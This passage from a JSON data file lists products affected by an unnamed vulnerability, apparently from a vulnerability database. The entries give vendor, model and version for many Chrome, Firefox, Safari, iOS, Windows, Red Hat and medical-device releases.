0.3, "vendor": "google", "version": "5.0.375.71" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.407.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.57" }, { "model": "pyxis medstation es", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.892.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.51" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.518.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.346.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1658.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.897.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.102" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.421.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.132" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.56" }, { "model": "pyxis stockstation system", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.0" }, { "model": "simotion p320-4s", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "36.0.1985.143" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1003.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.927.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.382.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5.3" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "10.0.8" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.23" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "2.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "49.0.2623.75" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.55" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.462.0" }, { "model": "simatic ipc827d", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1021.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "10.0.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.9" }, { "model": "enterprise linux server tus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-7.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.77" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.16" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.818.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.08" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.645.0" }, { "model": "vrealize automation", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.126" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.23" }, { "model": "chrome ~~~and", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "38.0.2125.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1065.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.674.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.905.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "facssample prep assistant iii", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.169" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.531.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.23" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1284.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.115" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "20.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.59" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1040.0" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "5.1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.35" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.939.0" }, { "model": "windows version for 32-bit systems", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "1017030" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.758.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.93" }, { "model": "fusion", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "8.5.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.116" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.99" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.3.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.184" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.154" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.112" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.0.2" }, { "model": "windows for 32-bit systems", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.42" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.8" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.0.15" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "0.0.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "48.0.2564.109" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.344" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "6.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.419.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.672.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.608.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.135" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.675.0" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.0.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "5.1.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.222.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.124" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.117" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.755.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1072.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.437.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.102" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.435.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.215" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "7.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.63" }, { "model": "pyxis medication administration", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.777.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.617.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1019.0" }, { "model": "enterprise linux for real time", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "10.0.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.71" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.685.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.312" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.30" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.110" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.699.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.65" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.3.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.453.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.961.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.3" }, { "model": "fusion", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "8.5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.202" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "5.0.4" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.0.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.0.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "30" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.1.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.341" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.116" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.57" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1058" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "56.0.2924.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1662.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1669.3" }, { "model": "facsverse", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.52" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.506.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1054" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.132" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "17.0.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.168" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.16" }, { "model": "kiestra tla/wca", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1286.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.703.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.668.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "31.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.744.0" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.1.2" }, { "model": "internet explorer", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "10" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.35" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.31" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "25.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "57.0.2987.133" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1078.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5.18" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.116" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.328.0" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.91" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.381.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.144" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "0.9.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.102" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1283.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.711.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.109" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.330" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.21" }, { "model": "malware analysis appliance", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "54.0.2840.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "54.0.2840.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.511.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.686.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.147" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.797.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.14443" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.521.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.46" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.0" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.774.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.458.2" }, { "model": "watchos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.350.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.803.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.49" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.155" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.623.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.51" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.345.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.215" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.23" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.88" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1001.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.859.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.686.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1674.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.930.0" }, { "model": "pyxis specimen collection verification", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.6" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.50" }, { "model": "windows server r2 for x64-based systems sp1", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "2008" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.562.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.9" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.4" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "55.0.2883.75" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.798.0" }, { "model": "safari", "scope": "eq", "trust": 0.3, 